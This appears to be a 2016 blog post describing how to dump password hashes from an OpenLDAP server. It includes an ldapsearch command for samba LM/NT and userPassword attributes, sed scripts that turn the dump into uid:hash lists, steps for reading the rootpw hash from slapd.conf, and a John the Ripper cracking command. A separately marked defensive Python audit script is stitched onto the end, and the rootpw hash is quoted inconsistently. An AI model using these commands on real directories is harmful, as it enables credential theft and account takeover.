Wednesday, October 26, 2016

LDAP attributes for password extraction

 for ldap attribute extraction the following are key:  
 Filter: (objectClass=*)  
 Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword  
 i have access to an openldap server. yes!  
 the search DN is:  
 dc=my,dc=pants,dc=com  
   
 valid user accounts are kept:  
 ou=users,DN  
   
 retired user accounts are kept:  
 ou=yawn,DN  

 let's grab passwords...
  
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword \
 -h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL \
 -v "(objectClass=*)" sambaLMPassword > lmpassword
   
 i know that all valid accounts have this format:  
 dn: uid=username  
   
 some places have a different dn: than the valid logon id;  
 in those cases the logon id is simply the uid=username attribute.  
   
 my script below is to slice and dice "dn: uid="  
   
 when doing the ldap dump, however, the order of attributes may vary between entries. more advanced  
 text processing is required for proper formatting... i digress.  
  
   
 #!/bin/bash  
   
 dumporig=userpassword  
 dump=userpassword.sed  
   
 cp $dumporig $dump  
   
 sed -i '/ou=groups/d' $dump                         # remove groups as dumped  
 sed -i '/sambaDomainName/d' $dump                   # there are no passes for me here  
 sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump               # admin has cn: as do others  
 sed -i '/^$/d' $dump                                # blank lines be gone  
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump # stripping dn  
 sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump  # removing dangling dn  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  # stripping dn  
 sed -i 's/,dc=my,dc=pants,dc=com//g' $dump          # removing dangling dn  
 sed -i '/dc=my/d' $dump                             # removing dangling dn  
 sed -i 's/dn:\ uid=//g' $dump                       # we only want uid  
 sed -i '/dn:\ /d' $dump                             # for records that only have a leading dn:  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump               # fun with line breaks: join everything on one line  
 sed -i 's/userPassword::/userPassword:/g' $dump     # converting attribute. some are :: (base64) others :  
 sed -i 's/userPassword//g' $dump                    # remove the attribute name altogether. only : remains  
 sed -i 's/blast:\ /:/g' $dump                       # fun: glue uid and value with a :  
 sed -i 's/blast/\n/g' $dump                         # convert fun back to a new line  
 sed -i '/:/!d' $dump                                # no : ? go away  
 sed -i '/^:/d' $dump                                # start with : ? go away  
 sed -i 's/=//g' $dump                               # remove any remaining = (including base64 padding)  
 sort -u $dump > $dump.out                           # sort the output  
 rm $dump                                            # remove temp file  
   
for sambaLMPassword it is a little simpler. sambaNTPassword is handled the same way: substitute that attribute name when processing the file.
 #!/bin/bash  
   
 dumporig=lmpassword  
 dump=lmpassword.sed  
   
 cp $dumporig $dump  
 sed -i '/ou=groups/d' $dump                         # remove groups as dumped  
 sed -i '/sambaDomainName/d' $dump                   # no passes here  
 sed -i '/dn:\ cn=/d' $dump                          # drop cn= records  
 sed -i '/^$/d' $dump                                # blank lines be gone  
 sed -i '/^uid:\ /d' $dump                           # removing uid if we dumped it  
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump # stripping dn  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  # stripping dn  
 sed -i '/dc=my/d' $dump                             # removing dangling dn  
 sed -i 's/dn:\ uid=//g' $dump                       # we only want uid  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump               # join everything on one line  
 sed -i 's/sambaLMPassword//g' $dump                 # remove the attribute name. only : remains  
 sed -i 's/blast:\ /:/g' $dump                       # glue uid and value with a :  
 sed -i 's/blast/\n/g' $dump                         # back to one record per line  
 sed -i '/:/!d' $dump                                # no : ? go away  
 sort -u $dump > $dump.out                           # sort the output  
 rm $dump                                            # remove temp file  
   
 but... what is the rootdn password for accessing the openldap server?  
   
 it is found here:  
 /etc/ldap/slapd.conf  
   
 scroll down to:  
 rootdn  
   
 another account worth checking is replicator, but  
 it may be restricted to certain hosts.  
   
 rootdn "cn=admin,dc=my,dc=pants,dc=com"  
 moduleload syncprov.la  
 overlay syncprov  
 syncprov-checkpoint 100 10  
 syncprov-sessionlog 100  
 rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p  
   
 crack that password by placing the following in a text file, say slap.out:  
   
 rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p  
   
 /opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out  
   
 * note: --format=salted-sha1-opencl may barf:  
 Build log: ptxas error  : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)  
   
 it is only one password...  
    
however.
 if you are able to grab an ldif, things are way easier.  
   
 sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out  
   
 this matches lines containing the strings "dn:" or "Password" (the b branches skip the final d) and prints  
 them, in the order they appear in the ldif, to an output file.  
   
 easy. then you parse away.  
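The attribute juggling noted above and the "parse away" step here both come down to reading LDIF properly instead of line-oriented sed. As an added example that is not part of the original post, the Python below parses an LDIF export the way RFC 2849 defines it (attribute order free to vary, `::` base64 values, values folded onto continuation lines) and then audits it from the directory owner's side: it reports which accounts carry sambaLMPassword/sambaNTPassword or a userPassword in a weak scheme, without printing any hash. The sample LDIF is constructed and every value in it is fake; the set of schemes treated as weak is an assumption about what an audit should flag.

```python
"""Parse an LDIF export and audit how password material is stored in it.

Added example, not code from the original post: an LDIF reader that handles
what the sed pipelines trip over (attribute order differing between entries,
base64 values marked with '::', values folded onto continuation lines), then
reports accounts holding sambaLMPassword / sambaNTPassword or a userPassword
in a weak scheme. Hashes themselves are never printed.
"""
import base64

# Constructed sample (all values fake). Attribute order deliberately differs
# between entries, alice's userPassword is base64 ('::', decodes to
# '{SSHA}abc'), admin's is folded across a continuation line, and the LM
# hash is a placeholder.
SAMPLE_LDIF = """\
dn: uid=alice,ou=users,dc=my,dc=pants,dc=com
objectClass: sambaSamAccount
uid: alice
sambaLMPassword: 0123456789ABCDEF0123456789ABCDEF
userPassword:: e1NTSEF9YWJj

dn: uid=bob,ou=yawn,dc=my,dc=pants,dc=com
userPassword: {CLEARTEXT}hunter2
uid: bob
objectClass: inetOrgPerson

dn: cn=admin,dc=my,dc=pants,dc=com
userPassword: {SSHA}c29tZWNvbnN0cnVjdGVk
 c2FsdGVkaGFzaA==
objectClass: organizationalRole

dn: ou=groups,dc=my,dc=pants,dc=com
objectClass: organizationalUnit
"""

# Assumed audit policy: schemes with no salt, a broken digest, or no hash at all.
WEAK_SCHEMES = {"{CLEARTEXT}", "{MD5}", "{SHA}", "{SMD5}", "{CRYPT}"}

SAMBA_HASH_ATTRS = {"sambalmpassword": "sambaLMPassword",
                    "sambantpassword": "sambaNTPassword"}


def parse_ldif(text):
    """Return a list of entries; each maps a lower-cased attribute name to
    the list of its values (the dn is stored under 'dn')."""
    # RFC 2849: a line beginning with one space continues the previous line.
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    entries, entry = [], None
    for line in unfolded + [""]:          # sentinel blank line closes the last entry
        if line == "":
            if entry is not None:
                entries.append(entry)
                entry = None
            continue
        if line.startswith("#"):          # LDIF comment
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):         # '::' marks a base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        if entry is None:
            entry = {}
        # LDAP attribute names are case-insensitive; normalise so lookups work
        entry.setdefault(name.lower(), []).append(value)
    return entries


def password_scheme(value):
    """Return the '{SCHEME}' prefix of a userPassword value; no prefix means
    the server stored the password as cleartext."""
    if value.startswith("{") and "}" in value:
        return value[: value.index("}") + 1].upper()
    return "{CLEARTEXT}"


def rdn_value(dn):
    """'uid=alice,ou=users,...' -> 'alice' (what the sed pipelines strip down to)."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def audit(text):
    """Return (account, finding) pairs for every entry holding weak password material."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", [""])[0]
        if not dn:
            continue
        account = rdn_value(dn)
        for key, display in SAMBA_HASH_ATTRS.items():
            if key in entry:
                findings.append((account, f"{display} present (unsalted Windows hash)"))
        for value in entry.get("userpassword", []):
            scheme = password_scheme(value)
            if scheme in WEAK_SCHEMES:
                findings.append((account, f"userPassword stored as {scheme}"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(SAMPLE_LDIF):
        print(f"{account}: {finding}")
```

Run against the constructed sample it reports alice (LM hash present) and bob (cleartext userPassword) and stays silent on admin, whose {SSHA} value was reassembled correctly from the folded line. Pointing `audit()` at a real `slapcat` export is the quickest way to see whether a directory is still handing out the attributes this post goes after.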
   
